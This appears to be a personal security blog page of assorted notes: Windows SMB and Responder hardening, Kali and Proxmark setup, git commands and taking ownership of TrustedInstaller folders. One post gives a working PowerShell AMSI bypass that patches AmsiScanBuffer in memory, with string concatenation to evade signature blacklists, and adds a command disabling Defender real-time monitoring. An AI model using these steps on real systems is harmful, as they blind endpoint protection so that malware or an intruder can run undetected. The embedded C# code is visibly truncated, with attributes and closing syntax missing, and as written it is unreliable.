Just another vulnerable WordPress site

Windows Hardening Stuff

This is a random list of notes for Windows Hardening

Against Responder

“Turn off multicast name resolution” Enabled

Don’t need SMB? Turn it off

From Services.msc Disable and Stop “Server” AKA LanmanServer. Restart.

Need SMB but worried about Eternal Blue?

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Fuck it why not just turn it all off for good measure?
Set-SmbServerConfiguration -EnableSMB2Protocol $false


Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to powershell with admin rights. For the record, I’m not sure if this will work on a domain joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistend and it also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel, the exact code in his blog post no longer works because it contains “AmsiScanBuffer” but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open_vm_tools open_vm_tools_desktop

Then make sure you share your folder through VM -> Settings -> Options tab and then set it to “Always Enabled”

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

Kali Proxmark Quick Setup

This massive one-liner should work to install all the source.

sudo apt install -y p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libpcsclite-dev && git clone https://github.com/Proxmark/proxmark3.git && cd proxmark3 && make clean && make all

Now install the bootloader.

./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf

Now install the full image. I encountered issues flashing the full image wherein my Proxmark3 RD4 had both A & C lights lit red, and it would not reconnect. Try this command to flash the bootloader, and if you have the same issue I did follow the next steps.

./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf

If you have issues like I did, stop the Modem Manager service, unplug the device, hold the white button, plug it back in, and reflash the full image. Once flashing has completed, you can release the button.

systemctl stop ModemManager.service

Finally, connect to your Proxmark 🙂

./client/proxmark3 /dev/ttyACM0

Credit to Alex Dib

Git Setup CheatSheet

Setting up your user

git config --global user.name "Your name here"
git config --global user.email "your_email@example.com"
add your ssh key (in ~/.ssh/id_rsa.pub) to your github account
ssh -T git@github.com

credit to kbroman

Setting up a new repository

Create an empty repository on github
git init
git add .
git remote add origin git@github.com:username/new_repo
git push -u origin master

credit to kbroman

Setting up a .gitignore file

vim .gitignore
git rm -r --cached .
git add .
git commit -m "Added .gitignore"
git push

I had issues with this in powershell for some reason, using the Windows Subsystem for Linux worked like a charm though.

To make a new commit

git add .
git commit -m "next commit"
git push

I also highly recommend using git status before creating a new commit to check that everything is working correctly.

Beating Windows TrustedInstaller Permissions

takeown /F X:\FULL_PATH_TO_FOLDER /r /d y
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

Credit to Micah in the comments.

Making this blog – Expectations

This blog is totally gonna get pwned within 24 hours of Google indexing it.

Things you can expect from this blog:

  • Posts about beginners’ and maybe advanced cyber security
  • Every single bug in discord.py
  • Musings on esoteric game systems
  • Delusions about Game Development
  • A splash of Personal Development
  • The World of Worldbuilding
  • Maybe some magic? (not the TCG)

Things you can’t expect from this blog:

  • Common sense
  • Pop culture
  • The revelation that I am secretly Bruce Schneier

© 2019 Kazam

Theme by Anders NorenUp ↑